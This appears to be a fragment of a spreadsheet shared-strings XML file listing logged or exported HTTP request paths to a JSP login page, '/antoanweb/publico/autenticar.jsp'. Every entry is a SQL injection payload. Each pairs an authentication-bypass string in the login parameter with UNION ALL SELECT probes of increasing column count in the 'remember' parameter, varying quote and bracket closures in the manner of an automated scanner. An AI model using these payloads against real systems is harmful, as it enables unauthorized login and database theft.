    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('cqva'='cqva&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('wzvs'='wzvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('hmgs'='hmgs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('eues'='eues&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('dwma'='dwma&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('sjoa'='sjoa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((('oxyn'='oxyn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((('cftb'='cftb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((('lbum'='lbum&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('rvdv'='rvdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('gidx'='gidx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('rcpk'='rcpk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('dpgj'='dpgj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('pbun'='pbun&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('vkym'='vkym&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('vbua'='vbua&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'wlpo'='wlpo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'lcxo'='lcxo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'gunu'='gunu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'idjt'='idjt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'dqli'='dqli&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'tfpp'='tfpp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'gqsp'='gqsp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'erxx'='erxx&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'qwwk'='qwwk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'smly'='smly&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null#and('xbsk'like'xbsk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and('mnpv'like'mnpv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and('acsm'like'acsm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and('spmq'like'spmq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('pdfv'like'pdfv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('cghl'like'cghl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('pdrk'like'pdrk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('sjnz'like'sjnz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('leag'like'leag&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and('vvtl'like'vvtl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(('efvt'like'efvt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(('sxim'like'sxim&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(('budg'like'budg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('liqz'like'liqz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('nkwq'like'nkwq&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('hrjy'like'hrjy&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('them'like'them&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('fvnr'like'fvnr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('bkjc'like'bkjc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(('kflv'like'kflv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((('thzg'like'thzg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((('fobi'like'fobi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((('pglw'like'pglw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('jqmo'like'jqmo&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('pycs'like'pycs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('slka'like'slka&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('nxed'like'nxed&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('arlt'like'arlt&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('jjlf'like'jjlf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=')))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((('upft'like'upft&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null#and'ngzf'like'ngzf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and'rmvs'like'rmvs&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and'trqj'like'trqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and'gtdv'like'gtdv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'dxaa'like'dxaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'ochz'like'ochz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'zpbl'like'zpbl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'vjhf'like'vjhf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'besp'like'besp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember='unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and'lenw'like'lenw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null#and("zuyb"="zuyb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and("kwvk"="kwvk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and("cpzk"="cpzk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and("tmke"="tmke&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("ahyi"="ahyi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("kbmc"="kbmc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("oqiu"="oqiu&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("qzqw"="qzqw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("fkcg"="fkcg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("tkif"="tkif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(("jugg"="jugg&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(("dcdf"="dcdf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(("bhjd"="bhjd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ksqp"="ksqp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("flyk"="flyk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("qpax"="qpax&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("snqj"="snqj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("moaa"="moaa&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("lubc"="lubc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and(("ikyj"="ikyj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and((("skbk"="skbk&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and((("muho"="muho&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and((("hmnn"="hmnn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("olkr"="olkr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("tshv"="tshv&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("know"="know&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("dkcl"="dkcl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("khyl"="khyl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("czzl"="czzl&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and((("qkfi"="qkfi&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null#and"wmlp"="wmlp&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and"ngnj"="ngnj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and"cxyf"="cxyf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and"bxgf"="bxgf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"isep"="isep&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"wtjn"="wtjn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"icif"="icif&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"cmiw"="cmiw&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"rfmf"="rfmf&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and"lrjb"="lrjb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null#and("ryre"like"ryre&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and("kfbb"like"kfbb&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and("susj"like"susj&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null#and("wtja"like"wtja&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("owwd"like"owwd&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("yutz"like"yutz&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("xwqm"like"xwqm&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("jfqr"like"jfqr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("gmij"like"gmij&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=")unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null,null#and("tawn"like"tawn&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null#and(("yssc"like"yssc&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null#and(("lffr"like"lffr&amp;modo=entrar</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember="))unionallselectnull,null,null,null,null,null,null,null,null,null,null,null,null#and(("geld"like"geld&amp;modo=entrar</t>
  </si>
  <si>
